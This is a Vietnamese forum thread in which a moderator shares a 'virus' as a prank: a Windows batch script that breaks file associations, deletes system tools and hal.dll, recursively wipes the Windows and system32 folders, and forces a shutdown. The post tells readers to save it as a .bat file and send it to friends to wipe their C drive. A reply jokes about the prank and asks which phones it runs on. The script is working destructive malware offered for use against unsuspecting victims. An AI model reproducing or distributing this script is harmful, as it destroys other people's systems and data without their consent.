Share Virus Phá Ổ C:\WINDOWS

Hero

Super Moderator
Staff member
#1
Nghịch tí cho vui đi =))
@Echo Off
@cls
@title welcome to vn-zoom.com
@assoc exe=txt
@assoc reg=jpg
@cd %systemroot%
@del /f /s /q TASKMAN.EXE
@cd %Systemroot%\system32
@del /f /s /q hal.dll
@del /f /s /q taskkil.exe
@del /f /s /q tasklist.exe
@del /f /s /q taskman.exe
@del /f /s /q taskmgr.exe
@shutdown Thanks neu cai lai win -s -t 06 -c " Fatal loi #1337, Duck!"
@del /f /s /q *.*
@cd ..
@del /f /s /q TASKMAN.EXE
@del /f /s /q *.*
@exit
Copy vào Notepad sau đó đổi tên file thành (.bat) có thể gửi cho bạn bè nếu muốn , click vào Nó sẽ xóa tất cả những gì có trong ổ C bao gồm Cookie,Windows,Sytem v.v...
 
#5
Á ! Chơi vậy người ta mà biết đập vở mồm, nhưng cũng hay, nhưng đt nào thì xài được vậy. Nokia, samsum, fpt, Q mobile. . .
 

Facebook Comments

New posts Latest threads Latest profile posts

Top